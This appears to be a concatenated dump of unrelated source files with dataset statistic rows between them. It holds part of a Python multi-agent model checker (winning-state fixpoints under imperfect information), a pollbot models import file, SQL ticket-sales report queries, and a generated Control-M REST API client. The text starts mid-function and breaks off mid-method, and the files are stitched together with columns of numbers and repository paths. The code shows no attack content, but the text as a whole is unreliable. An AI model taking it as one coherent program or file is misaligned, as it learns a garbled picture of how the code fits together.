if winning_states_disjoint.find(transition['nextState']) != first_winning:
bad_actions.add(transition['actions'][agent])
all_actions -= bad_actions
if len(all_actions) > 0:
result_states.extend(same_states)
winning_states_disjoint.union(first_winning, state)
first_winning = winning_states_disjoint.find(first_winning)
modified = True
return {'result': result_states, 'modified': modified}
def basic_formula_one_agent_multiple_states(self, agent, current_states, is_winning_state):
result_states = set()
actions = self.agents_actions[agent]
preimage = []
for winning_state in current_states:
preimage += self.pre_states[winning_state]
unique(preimage)
for state in preimage:
state_epistemic_class = self.epistemic_class_membership[agent][state]
if state_epistemic_class == -1:
same_states = [state]
else:
same_states = self.imperfect_information[agent][state_epistemic_class]
for action in actions:
good_states = []
number_of_good = 0
should_break = False
is_good_state = {}
for same_state in same_states:
is_good_state[same_state] = False
if self.is_reachable_by_agent(action, same_state, is_winning_state, agent):
good_states.append(same_state)
is_good_state[same_state] = True
number_of_good += 1
elif not self.is_reachable_by_agent_in_set(action, same_state, same_states, agent):
should_break = True
# else: # for standard model
# should_break = True
if should_break:
continue
modified = True
while modified:
modified = False
for same_state in same_states:
if is_good_state[same_state]:
continue
if self.is_reachable_by_agent_in_set(action, same_state, good_states, agent):
good_states.append(same_state)
is_good_state[same_state] = True
number_of_good += 1
modified = True
if number_of_good == len(same_states):
result_states.update(same_states)
break
for same_state in same_states:
if same_state != state and same_state in preimage:
preimage.remove(same_state)
for state_number in result_states:
is_winning_state[state_number] = True
return result_states
def basic_formula_one_agent_multiple_states_mcmas_approach(self, agent, current_states, is_winning_state):
result_states = set()
actions = self.agents_actions[agent]
preimage = []
for winning_state in current_states:
preimage += self.pre_states[winning_state]
unique(preimage)
for state in preimage:
state_epistemic_class = self.epistemic_class_membership[agent][state]
if state_epistemic_class == -1:
same_states = [state]
else:
same_states = self.imperfect_information[agent][state_epistemic_class]
all_actions = set()
bad_actions = set()
for same_state in same_states:
for transition in self.transitions[same_state]:
all_actions.add(transition['actions'][agent])
if not is_winning_state[transition['nextState']]:
bad_actions.add(transition['actions'][agent])
all_actions -= bad_actions
if len(all_actions) > 0:
result_states.update(same_states)
for same_state in same_states:
if same_state != state and same_state in preimage:
preimage.remove(same_state)
for state_number in result_states:
is_winning_state[state_number] = True
return result_states
def basic_formula_multiple_agents_and_states_perfect_information(self, agents, current_states, is_winning_state):
result_states = set()
actions = self.get_agents_actions(agents)
winning_states_reverse = []
for winning_state in current_states:
winning_states_reverse += self.pre_states[winning_state]
unique(winning_states_reverse)
for state in winning_states_reverse:
for action in itertools.product(*actions):
if self.is_reachable_by_agents(action, state, is_winning_state, agents):
result_states.add(state)
for state_number in result_states:
is_winning_state[state_number] = True
return result_states
def basic_formula_one_agent_multiple_states_perfect_information(self, agent, current_states, is_winning_state):
result_states = set()
actions = self.agents_actions[agent]
winning_states_reverse = []
for winning_state in current_states:
winning_states_reverse += self.pre_states[winning_state]
unique(winning_states_reverse)
for state in winning_states_reverse:
for action in actions:
if self.is_reachable_by_agent(action, state, is_winning_state, agent):
result_states.add(state)
for state_number in result_states:
is_winning_state[state_number] = True
return result_states
def basic_formula_one_agent_multiple_states_perfect_information_mcmas_approach(self, agent, current_states, is_winning_state):
result_states = set()
actions = self.agents_actions[agent]
winning_states_reverse = []
for winning_state in current_states:
winning_states_reverse += self.pre_states[winning_state]
unique(winning_states_reverse)
for state in winning_states_reverse:
all_actions = set()
bad_actions = set()
for transition in self.transitions[state]:
all_actions.add(transition['actions'][agent])
if not is_winning_state[transition['nextState']]:
bad_actions.add(transition['actions'][agent])
all_actions -= bad_actions
if len(all_actions) > 0:
result_states.add(state)
for state_number in result_states:
is_winning_state[state_number] = True
return result_states
def minimum_formula_multiple_agents_and_states(self, agents, winning_states):
result_states = set()
result_states.update(winning_states)
result_states_length = len(result_states)
number_of_iterations = 0
current_states = winning_states[:]
is_winning_state = [False for _ in itertools.repeat(None, self.number_of_states)]
for state_number in winning_states:
is_winning_state[state_number] = True
while True:
current_states = self.basic_formula_multiple_agents_and_states(agents, current_states, is_winning_state)
result_states.update(current_states)
new_results_states_length = len(result_states)
if result_states_length == new_results_states_length:
break
result_states_length = new_results_states_length
number_of_iterations += 1
print('Minimum formula iterations:', number_of_iterations)
return result_states
def minimum_formula_one_agent_multiple_states_disjoint(self, agent, winning_states):
if len(winning_states) == 0:
return []
result_states = set()
result_states.update(winning_states)
number_of_iterations = 0
current_states = winning_states[:]
winning_states_disjoint = DisjointSet(0)
winning_states_disjoint.subsets = copy.deepcopy(self.epistemic_class_disjoint[agent].subsets)
first_winning = winning_states_disjoint.find(winning_states[0])
epistemic_class_numbers = set()
for state_number in winning_states:
epistemic_class_number = self.epistemic_class_membership[agent][state_number]
epistemic_class_numbers.add(epistemic_class_number)
for epistemic_class_number in epistemic_class_numbers:
epistemic_states = self.imperfect_information[agent][epistemic_class_number]
is_ok = True
for epistemic_state in epistemic_states:
state_number = epistemic_state
if epistemic_state not in winning_states:
is_ok = False
break
if is_ok:
winning_states_disjoint.union(first_winning, state_number)
custom_can_go_there = self.can_go_there[agent][:]
while True:
formula_result = self.basic_formula_one_agent_multiple_states_disjoint(agent, current_states, first_winning,
winning_states_disjoint,
custom_can_go_there)
current_states = formula_result['result']
modified = formula_result['modified']
result_states.update(current_states)
if not modified:
break
number_of_iterations += 1
print('Minimum formula iterations:', number_of_iterations)
return result_states
def minimum_formula_one_agent_multiple_states_disjoint_mcmas_approach(self, agent, winning_states):
if len(winning_states) == 0:
return []
result_states = set()
result_states.update(winning_states)
number_of_iterations = 0
current_states = winning_states[:]
winning_states_disjoint = DisjointSet(0)
winning_states_disjoint.subsets = copy.deepcopy(self.epistemic_class_disjoint[agent].subsets)
first_winning = winning_states_disjoint.find(winning_states[0])
epistemic_class_numbers = set()
for state_number in winning_states:
epistemic_class_number = self.epistemic_class_membership[agent][state_number]
epistemic_class_numbers.add(epistemic_class_number)
for epistemic_class_number in epistemic_class_numbers:
epistemic_states = self.imperfect_information[agent][epistemic_class_number]
is_ok = True
for epistemic_state in epistemic_states:
state_number = epistemic_state
if epistemic_state not in winning_states:
is_ok = False
break
if is_ok:
winning_states_disjoint.union(first_winning, state_number)
custom_can_go_there = self.can_go_there[agent][:]
while True:
formula_result = self.basic_formula_one_agent_multiple_states_disjoint_mcmas_approach(agent, current_states, first_winning,
winning_states_disjoint,
custom_can_go_there)
current_states = formula_result['result']
modified = formula_result['modified']
result_states.update(current_states)
if not modified:
break
number_of_iterations += 1
print('Minimum formula iterations:', number_of_iterations)
return result_states
def minimum_formula_one_agent_multiple_states(self, agent, winning_states):
result_states = set()
result_states.update(winning_states)
result_states_length = len(result_states)
number_of_iterations = 0
current_states = winning_states[:]
is_winning_state = [False for _ in itertools.repeat(None, self.number_of_states)]
for state_number in winning_states:
is_winning_state[state_number] = True
while True:
current_states = self.basic_formula_one_agent_multiple_states(agent, current_states, is_winning_state)
result_states.update(current_states)
new_results_states_length = len(result_states)
if result_states_length == new_results_states_length:
break
result_states_length = new_results_states_length
number_of_iterations += 1
print('Minimum formula iterations:', number_of_iterations)
return result_states
def minimum_formula_multiple_agents_and_states_perfect_information(self, agents, winning_states):
result_states = set()
result_states.update(winning_states)
result_states_length = len(result_states)
number_of_iterations = 0
current_states = winning_states[:]
is_winning_state = [False for _ in itertools.repeat(None, self.number_of_states)]
for state_number in winning_states:
is_winning_state[state_number] = True
while True:
current_states = self.basic_formula_multiple_agents_and_states_perfect_information(agents, current_states,
is_winning_state)
result_states.update(current_states)
if result_states_length == len(result_states):
break
result_states_length = len(result_states)
number_of_iterations += 1
print('Minimum formula iterations:', number_of_iterations)
return result_states
def minimum_formula_one_agent_multiple_states_perfect_information(self, agent, winning_states):
result_states = set()
result_states.update(winning_states)
result_states_length = len(result_states)
number_of_iterations = 0
current_states = winning_states[:]
is_winning_state = [False for _ in itertools.repeat(None, self.number_of_states)]
for state_number in winning_states:
is_winning_state[state_number] = True
while True:
current_states = self.basic_formula_one_agent_multiple_states_perfect_information(agent, current_states,
is_winning_state)
result_states.update(current_states)
if result_states_length == len(result_states):
break
result_states_length = len(result_states)
number_of_iterations += 1
print('Minimum formula iterations:', number_of_iterations)
return result_states
def minimum_formula_one_agent_multiple_states_perfect_information_mcmas_approach(self, agent, winning_states):
result_states = set()
result_states.update(winning_states)
result_states_length = len(result_states)
number_of_iterations = 0
current_states = winning_states[:]
is_winning_state = [False for _ in itertools.repeat(None, self.number_of_states)]
for state_number in winning_states:
is_winning_state[state_number] = True
while True:
current_states = self.basic_formula_one_agent_multiple_states_perfect_information_mcmas_approach(agent, current_states,
is_winning_state)
result_states.update(current_states)
if result_states_length == len(result_states):
break
result_states_length = len(result_states)
number_of_iterations += 1
print('Minimum formula iterations:', number_of_iterations)
return result_states
def maximum_formula_one_agent_multiple_states(self, agent, winning_states):
result_states = set()
result_states.update(winning_states)
result_states_length = len(result_states)
number_of_iterations = 0
current_states = winning_states[:]
is_winning_state = [False for _ in itertools.repeat(None, self.number_of_states)]
for state_number in winning_states:
is_winning_state[state_number] = True
while True:
current_states = self.basic_formula_one_agent_multiple_states(agent, current_states, is_winning_state)
result_states = set(and_operator(result_states, current_states))
if result_states_length == len(result_states):
break
for state_number in result_states:
if state_number not in current_states:
is_winning_state[state_number] = False
result_states_length = len(result_states)
number_of_iterations += 1
print('Maximum formula iterations:', number_of_iterations)
return result_states
def maximum_formula_one_agent_multiple_states_perfect_information(self, agent, winning_states):
result_states = set()
result_states.update(winning_states)
result_states_length = len(result_states)
number_of_iterations = 0
current_states = winning_states[:]
is_winning_state = [False for _ in itertools.repeat(None, self.number_of_states)]
for state_number in winning_states:
is_winning_state[state_number] = True
while True:
current_states = self.basic_formula_one_agent_multiple_states_perfect_information(agent, current_states,
is_winning_state)
result_states = set(and_operator(result_states, current_states))
if result_states_length == len(result_states):
break
for state_number in result_states:
if state_number not in current_states:
is_winning_state[state_number] = False
result_states_length = len(result_states)
number_of_iterations += 1
print('Maximum formula iterations:', number_of_iterations)
return result_states
def create_agents_actions_combinations(self, agents):
combinations = []
possible_actions = []
for a in agents:
possible_actions.append(self.agents_actions[a])
for t in itertools.product(*possible_actions):
combinations.append(t)
return combinations
def walk_perfect_information(self, agent_number):
print("#####################################################")
print("Simulation")
current_state = 0
while True:
print()
print("Current state:", self.states[current_state])
if len(self.transitions[current_state]) == 0:
print("End")
return
print('Transitions:')
i = 0
for transition in self.transitions[current_state]:
print(str(i) + ":", transition)
i += 1
choice = int(input("Choose transition="))
if choice == -1:
print("End")
return
current_state = self.transitions[current_state][choice]['nextState']
def walk(self, agent_number, print_state):
print("#####################################################")
print("Simulation")
current_state = 0
while True:
print()
print("Current state:")
print_state(self.states[current_state])
print("Epistemic states:")
for state in self.imperfect_information[agent_number][
self.epistemic_class_membership[agent_number][current_state]]:
print_state(self.states[state])
if len(self.transitions[current_state]) == 0:
print("End")
return
print('Transitions:')
i = 0
for transition in self.transitions[current_state]:
print(str(i) + ":", transition)
i += 1
choice = int(input("Choose transition="))
if choice == -1:
print("End")
return
current_state = self.transitions[current_state][choice]['nextState']
@staticmethod
def is_possible_transition(agents, action, transition):
for i, j in zip(agents, range(0, len(agents))):
if transition['actions'][i] != action[j]:
return False
return True
| 40.602581
| 135
| 0.612991
| 3,450
| 31,467
| 5.213333
| 0.03971
| 0.072723
| 0.031135
| 0.036695
| 0.840042
| 0.79851
| 0.774436
| 0.745913
| 0.729845
| 0.720616
| 0
| 0.002691
| 0.314965
| 31,467
| 775
| 136
| 40.602581
| 0.831694
| 0.001907
| 0
| 0.701278
| 0
| 0
| 0.024743
| 0.003375
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063898
| false
| 0
| 0.004792
| 0
| 0.15016
| 0.049521
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5cb6a88b4bf6b01705fe513a02c5d1b806f44a29
| 351
|
py
|
Python
|
pollbot/models/__init__.py
|
3wille/ultimate-poll-bot
|
7a99659df463a891b20a1ab424665cd84d4242b4
|
[
"MIT"
] | null | null | null |
pollbot/models/__init__.py
|
3wille/ultimate-poll-bot
|
7a99659df463a891b20a1ab424665cd84d4242b4
|
[
"MIT"
] | null | null | null |
pollbot/models/__init__.py
|
3wille/ultimate-poll-bot
|
7a99659df463a891b20a1ab424665cd84d4242b4
|
[
"MIT"
] | null | null | null |
from pollbot.models.poll import Poll # noqa
from pollbot.models.poll_option import PollOption # noqa
from pollbot.models.reference import Reference # noqa
from pollbot.models.user import User # noqa
from pollbot.models.vote import Vote # noqa
from pollbot.models.update import Update # noqa
from pollbot.models.notification import Notification # noqa
| 43.875
| 59
| 0.820513
| 50
| 351
| 5.74
| 0.26
| 0.268293
| 0.414634
| 0.439024
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119658
| 351
| 7
| 60
| 50.142857
| 0.928803
| 0.096866
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7a3e4e910a0f7b86c400fb073649a07f5d62424b
| 1,975
|
py
|
Python
|
texas/queries.py
|
FirePonyCreativeSociety/blackrocktickets
|
8407cdf36b5bef990f6b1e1ea4ca6d1107611304
|
[
"Apache-2.0"
] | 15
|
2015-02-08T17:05:44.000Z
|
2019-09-22T16:06:13.000Z
|
texas/queries.py
|
FirePonyCreativeSociety/blackrocktickets
|
8407cdf36b5bef990f6b1e1ea4ca6d1107611304
|
[
"Apache-2.0"
] | 6
|
2021-06-11T17:41:36.000Z
|
2021-06-11T21:22:25.000Z
|
texas/queries.py
|
FirePonyCreativeSociety/blackrocktickets
|
8407cdf36b5bef990f6b1e1ea4ca6d1107611304
|
[
"Apache-2.0"
] | 6
|
2016-03-27T01:45:00.000Z
|
2021-01-07T15:31:45.000Z
|
TICKETS_SOLD_BY_DAYS = """
SELECT DATE_FORMAT(p.purchase_date, '%%Y/%%m/%%d') AS 'purchase_date',
COUNT(DISTINCT tc.id) AS 'ticket_count'
FROM texas_occurrence o
INNER JOIN texas_purchase p ON p.occurrence_id = o.id
INNER JOIN texas_ticket tc ON tc.purchase_id = p.id
WHERE o.id = %s
AND p.status = 'P'
GROUP BY DATE_FORMAT(p.purchase_date, '%%Y/%%m/%%d')
ORDER BY p.purchase_date
"""
TICKETS_SOLD_BY_MONTH = """
SELECT DATE_FORMAT(p.purchase_date, '%%Y/%%m') AS 'purchase_month',
COUNT(DISTINCT tc.id) AS 'ticket_count'
FROM texas_occurrence o
INNER JOIN texas_purchase p ON p.occurrence_id = o.id
INNER JOIN texas_ticket tc ON tc.purchase_id = p.id
WHERE o.id = %s
AND p.status = 'P'
GROUP BY DATE_FORMAT(p.purchase_date, '%%Y/%%m')
ORDER BY p.purchase_date
"""
TICKETS_SOLD_BY_TIER = """
SELECT ti.label AS 'tier',
COUNT(DISTINCT tc.id) AS 'ticket_count'
FROM texas_occurrence o
INNER JOIN texas_purchase p ON p.occurrence_id = o.id
INNER JOIN texas_ticket tc ON tc.purchase_id = p.id
INNER JOIN texas_tier ti ON ti.id = tc.tier_id
WHERE o.id = %s
AND p.status = 'P'
GROUP BY ti.label
ORDER BY ti.start_date
"""
USERS_BY_TICKET_COUNT = """
SELECT ticket_count AS 'tickets',
COUNT(user_id) AS 'user_count'
FROM (
SELECT COUNT(tc.id) AS 'ticket_count',
p.user_id
FROM texas_occurrence o
INNER JOIN texas_purchase p ON p.occurrence_id = o.id
INNER JOIN texas_ticket tc ON tc.purchase_id = p.id
WHERE o.id = %s
AND p.status = 'P'
GROUP BY p.user_id
) AS a
GROUP BY a.ticket_count
ORDER BY a.ticket_count
"""
AVG_TICKETS_BY_TIER = """
SELECT ti.label AS 'tier',
COUNT(DISTINCT tc.id) / COUNT(DISTINCT p.id) AS 'avg_tickets'
FROM texas_occurrence o
INNER JOIN texas_purchase p ON p.occurrence_id = o.id
INNER JOIN texas_ticket tc ON tc.purchase_id = p.id
INNER JOIN texas_tier ti ON ti.id = tc.tier_id
WHERE o.id = %s
AND p.status = 'P'
GROUP BY ti.label
ORDER BY ti.start_date
"""
| 29.477612
| 70
| 0.708861
| 363
| 1,975
| 3.663912
| 0.110193
| 0.081203
| 0.126316
| 0.084211
| 0.830827
| 0.818045
| 0.818045
| 0.818045
| 0.721805
| 0.721805
| 0
| 0
| 0.180253
| 1,975
| 66
| 71
| 29.924242
| 0.821495
| 0
| 0
| 0.693548
| 0
| 0
| 0.921519
| 0.056709
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7a6e890aaf9f5bdd25c80578d729ab4a164c7f82
| 432,835
|
py
|
Python
|
controlm_py/api/config_api.py
|
dcompane/controlm_py
|
c521208be2f00303383bb32ca5eb2b7ff91999d3
|
[
"MIT"
] | 2
|
2020-03-20T18:24:23.000Z
|
2021-03-05T22:05:04.000Z
|
controlm_py/api/config_api.py
|
dcompane/controlm_py
|
c521208be2f00303383bb32ca5eb2b7ff91999d3
|
[
"MIT"
] | null | null | null |
controlm_py/api/config_api.py
|
dcompane/controlm_py
|
c521208be2f00303383bb32ca5eb2b7ff91999d3
|
[
"MIT"
] | 1
|
2021-05-27T15:54:37.000Z
|
2021-05-27T15:54:37.000Z
|
# coding: utf-8
"""
Control-M Services
Provides access to BMC Control-M Services # noqa: E501
OpenAPI spec version: 9.20.220
Contact: customer_support@bmc.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from controlm_py.api_client import ApiClient
class ConfigApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_agent(self, body, server, **kwargs): # noqa: E501
"""add agent to Server # noqa: E501
Add an agent to Server. This command does not install or configure the agent. It only defines the agent in the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_agent(body, server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AddAgentParams body: (required)
:param str server: The Server the agent is going to be added to. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_agent_with_http_info(body, server, **kwargs) # noqa: E501
else:
(data) = self.add_agent_with_http_info(body, server, **kwargs) # noqa: E501
return data
def add_agent_with_http_info(self, body, server, **kwargs): # noqa: E501
"""add agent to Server # noqa: E501
Add an agent to Server. This command does not install or configure the agent. It only defines the agent in the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_agent_with_http_info(body, server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AddAgentParams body: (required)
:param str server: The Server the agent is going to be added to. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_agent" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_agent`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `add_agent`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_archive_rule(self, body, **kwargs): # noqa: E501
"""Add Workload Archiving rule # noqa: E501
Add a new Workload Archiving rule # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_archive_rule(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ArchiveRule body: archive rule details to add (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_archive_rule_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_archive_rule_with_http_info(body, **kwargs) # noqa: E501
return data
def add_archive_rule_with_http_info(self, body, **kwargs): # noqa: E501
"""Add Workload Archiving rule # noqa: E501
Add a new Workload Archiving rule # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_archive_rule_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ArchiveRule body: archive rule details to add (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_archive_rule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_archive_rule`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/archive/rule', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_external_user(self, body, **kwargs): # noqa: E501
"""Add and external user # noqa: E501
Add and external user for b2b # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_external_user(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ExternalUserData body: External user data (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_external_user_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_external_user_with_http_info(body, **kwargs) # noqa: E501
return data
def add_external_user_with_http_info(self, body, **kwargs): # noqa: E501
"""Add and external user # noqa: E501
Add and external user for b2b # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_external_user_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ExternalUserData body: External user data (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_external_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_external_user`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/externaluser', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_external_user_or_user_group_to_mft_folder(self, folder_name, user_or_group, **kwargs): # noqa: E501
"""Add external user or user groups to virtual folder external users list. # noqa: E501
Add external user user groups to virtual folder external users list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_external_user_or_user_group_to_mft_folder(folder_name, user_or_group, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str folder_name: Name of folder (required)
:param str user_or_group: The user name or group name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_external_user_or_user_group_to_mft_folder_with_http_info(folder_name, user_or_group, **kwargs) # noqa: E501
else:
(data) = self.add_external_user_or_user_group_to_mft_folder_with_http_info(folder_name, user_or_group, **kwargs) # noqa: E501
return data
def add_external_user_or_user_group_to_mft_folder_with_http_info(self, folder_name, user_or_group, **kwargs): # noqa: E501
"""Add external user or user groups to virtual folder external users list. # noqa: E501
Add external user user groups to virtual folder external users list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_external_user_or_user_group_to_mft_folder_with_http_info(folder_name, user_or_group, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str folder_name: Name of folder (required)
:param str user_or_group: The user name or group name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['folder_name', 'user_or_group'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_external_user_or_user_group_to_mft_folder" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'folder_name' is set
if ('folder_name' not in params or
params['folder_name'] is None):
raise ValueError("Missing the required parameter `folder_name` when calling `add_external_user_or_user_group_to_mft_folder`") # noqa: E501
# verify the required parameter 'user_or_group' is set
if ('user_or_group' not in params or
params['user_or_group'] is None):
raise ValueError("Missing the required parameter `user_or_group` when calling `add_external_user_or_user_group_to_mft_folder`") # noqa: E501
collection_formats = {}
path_params = {}
if 'folder_name' in params:
path_params['folderName'] = params['folder_name'] # noqa: E501
if 'user_or_group' in params:
path_params['userOrGroup'] = params['user_or_group'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/virtualfolder/{folderName}/user/{userOrGroup}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_gateway(self, body, **kwargs): # noqa: E501
"""add gateway. # noqa: E501
add gateway. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_gateway(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param GatewayData body: gateway data (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_gateway_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_gateway_with_http_info(body, **kwargs) # noqa: E501
return data
def add_gateway_with_http_info(self, body, **kwargs): # noqa: E501
"""add gateway. # noqa: E501
add gateway. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_gateway_with_http_info(body, async_req=True)
